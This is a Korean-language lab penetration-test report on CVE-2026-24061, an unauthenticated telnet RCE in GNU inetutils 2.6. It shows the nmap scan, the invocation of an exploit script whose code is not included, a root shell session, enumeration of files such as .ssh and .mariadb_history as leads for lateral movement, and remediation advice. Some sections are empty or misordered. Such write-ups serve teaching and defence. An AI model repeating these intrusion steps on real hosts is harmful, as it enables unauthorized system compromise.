
CVE-2026-24061에 대한 Cyberhawks 랩 내 분석/발견 기록
크레딧: @SafeBreach-Labs
CVE: CVE-2026-24061
랩: Cyberhawks Lab
대상: 10.1.1.1 (demo.cyberhawks.lab)
발견 ID: WU-08
날짜: 2026-09-08
심각도: 치명적(Critical)
상태: 확인됨 / 악용됨
Cyberhawks 랩 환경 평가 중 대상 호스트(10.1.1.1)에서 인증되지 않은 원격 코드 실행(RCE) 취약점이 식별되어 성공적으로 악용되었습니다. 노출된 Telnet 서비스(TCP/23)를 통한 CVE-2026-24061 악용으로 루트 권한의 대화형 셸이 확보되어 시스템에 대한 완전한 관리 제어권이 부여되었습니다.
| 필드 | 값 |
|---|---|
| 대상 IP | 10.1.1.1 |
| 대상 호스트명 | demo.cyberhawks.lab |
| 운영 체제 | Linux 6.12.41+deb13-amd64 (Debian 13) |
| 공격자 OS | Parrot OS |
| 평가 유형 | 침투 테스트(랩 환경) |
열린 포트와 서비스를 확인하기 위해 대상에 대해 Nmap 서비스 버전 스캔을 수행했습니다.
명령어:
nmap -sV 10.1.1.1
결과 요약:
주요 관찰 사항:
CVE-2026-24061은 GNU inetutils 2.6의 Telnet 데몬 구성 요소에 영향을 미치는 인증되지 않은 원격 코드 실행 취약점입니다. 악용 시 원격의 인증되지 않은 공격자가 실행 중인 서비스의 권한(이 경우 root)으로 대상 시스템에서 임의의 명령을 실행할 수 있습니다.
CVE-2026-24061을 대상으로 하는 전용 Python 익스플로잇 스크립트(telnet_rce.py)가 취약한 Telnet 서비스에 대해 실행되었습니다.
명령어:
python3 telnet_rce.py 10.1.1.1
익스플로잇 출력:
[*] Connected to 10.1.1.1:23
[*] Interactive session started. Use Ctrl+C to quit.
Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)
root@demo:~#
셸을 획득한 후 다음 명령어로 달성된 접근 수준을 확인했습니다:
신원 확인:
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)
파일시스템 열거:
root@demo:~# ls -la
total 36
drwx------ 6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r-- 1 root root 607 May 12 2025 .bashrc
drwx------ 4 root root 4096 Sep 6 2025 .cache
drwxr-xr-x 3 root root 4096 Sep 6 2025 .config
drwxrwxr-x 3 root root 4096 Sep 6 2025 .local
-rw------- 1 root root 261 Sep 6 2025 .mariadb_history
-rw-r--r-- 1 root root 132 May 12 2025 .profile
drwx------ 2 root root 4096 Sep 6 2025 .ssh
서비스 버전 확인
root@demo:~# telnet --version
telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by many authors.
사후 악용 단계의 주요 발견 사항:
.mariadb_history — 활성 MariaDB 데이터베이스 사용을 나타내며, 추가 자격 증명 수집 또는 데이터 유출 가능성이 있습니다..ssh/ 디렉터리 — 다른 호스트로의 측면 이동에 사용할 수 있는 개인 키가 포함되어 있을 수 있습니다.root(UID 0) 접근이 확인되었습니다.| 범주 | 평가 |
|---|---|
| 기밀성 | 치명적(Critical) — 시스템의 모든 데이터에 접근 가능 |
| 무결성 | 치명적(Critical) — 공격자가 모든 데이터를 수정하거나 파괴할 수 있음 |
| 가용성 | 치명적(Critical) — 공격자가 서비스를 중단시키거나 시스템을 충돌시킬 수 있음 |
단일의 인증되지 않은 단계로 전체 시스템 손상이 달성되었습니다. 이 네트워크 세그먼트에 접근할 수 있는 공격자는 다음을 수행할 수 있습니다:
apt update && apt install inetutils-telnetd
| 아티팩트 | 설명 |
|---|---|
| Nmap 스캔 출력 | 10.1.1.1의 전체 포트/서비스 열거 |
telnet_rce.py | CVE-2026-24061을 트리거하는 데 사용된 익스플로잇 스크립트 |
| 셸 세션 로그 | 대화형 루트 셸 기록 |
Cyberhawks Lab을 위해 작성된 보고서 — 교육 목적으로만 사용하십시오.
| 포트 | 상태 | 서비스 |
|---|
| 21/tcp | 열림 | FTP (tcpwrapped) |
| 22/tcp | 열림 | SSH (tcpwrapped) |
| 23/tcp | 열림 | Telnet |
| 25/tcp | 열림 | SMTP (tcpwrapped) |
| 53/tcp | 열림 | DNS (tcpwrapped) |
| 80/tcp | 열림 | HTTP (tcpwrapped) |
| 110/tcp | 열림 | POP3 (tcpwrapped) |
| 111/tcp | 열림 | RPC (tcpwrapped) |
| 139/tcp | 열림 | NetBIOS (tcpwrapped) |
| 143/tcp | 열림 | IMAP (tcpwrapped) |
| 445/tcp | 열림 | SMB (tcpwrapped) |
| 2049/tcp | 열림 | NFS (tcpwrapped) |
| 3306/tcp | 열림 | MySQL/MariaDB (tcpwrapped) |
| 3389/tcp | 열림 | RDP (tcpwrapped) |
| 5901/tcp | 열림 | VNC (tcpwrapped) |
| 필드 | 세부 정보 |
|---|
| CVE | CVE-2026-24061 |
| 영향받는 서비스 | Telnet (GNU inetutils 2.6, TCP/23) |
| 취약점 유형 | 인증되지 않은 원격 코드 실행(RCE) |
| CVSS 점수 | 치명적(Critical) |
| 필요한 인증 | 없음 |
| 필요한 사용자 상호작용 | 없음 |